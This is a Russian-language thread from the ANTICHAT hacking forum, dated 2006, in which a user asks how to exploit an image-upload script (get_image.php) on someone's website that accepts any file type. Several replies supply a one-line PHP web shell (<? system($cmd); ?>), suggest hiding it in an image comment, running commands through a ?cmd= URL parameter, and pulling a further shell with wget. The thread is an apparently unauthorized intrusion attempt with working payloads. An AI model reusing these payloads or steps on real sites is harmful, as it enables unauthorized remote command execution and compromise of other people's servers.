ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Зальем файлы на сайт через get_image.php |

07.05.2006, 23:07
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
Зальем файлы на сайт через get_image.php
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..
Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.
Все файлы появляются в папке /www.site.ru/img/
Какие есть варианты? 
|
|
|

07.05.2006, 23:49
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
залил.
После нажати я на кнопку добавить как и обычно вылелтел адресок куда все зелетело.
Выдалось http://..ru/img/1147031229.jpg
Нажимаю ничего не происходит..хотя через Ie он выдает текст shella
Что мне с ним делать?
Последний раз редактировалось djhoof; 08.05.2006 в 00:02..
|
|
|

08.05.2006, 00:20
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
Вот по хорошему его как нить залить в другую папку..через этот get_image.php
Какие мысли еще, народ?
|
|
|

08.05.2006, 00:32
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
Если нужно то могу этот исходничек get_image.php осветить.
|
|
|

08.05.2006, 03:03
|
|
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме: 163249
Репутация:
1
|
|
Попробуй
http://site.ru/index.php?cmd="php shell.jpg"
|
|
|

08.05.2006, 11:54
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!
А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..
|
|
|

08.05.2006, 12:40
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме: 2735257
Репутация:
103
|
|
Сообщение от djhoof
Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!
А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..
Это я предлогал но моё сообщение пропало куда то(
Вообщем команды там будут типа http://site.ru/img/fail.php?cmd= и тут команда типа uname -a воть а залить моно так ls -la
|
|
|

08.05.2006, 13:02
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме: 5885100
Репутация:
773
|
|
Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись
|
|
|

08.05.2006, 13:11
|
|
Новичок
Регистрация: 07.05.2006
Сообщений: 28
Провел на форуме: 66452
Репутация:
1
|
|
К сожалению или к счастью у меня нет огромного опыта в этих делах..дабы поэтому и спрашивал.
Можно мне написать подробно на счет fail.php?cmd=...(так как пока мне не покажешь..черт побери я так и не пойму..)
Заранее благодарен.
Я хотел бы научится, да вот только не знаю что да где..
|
|
|

08.05.2006, 13:31
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме: 5885100
Репутация:
773
|
|
djhoof статей по етомe поводу уйма почитай немного!!!
Можно мне написать подробно на счет fail.php?cmd=...
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|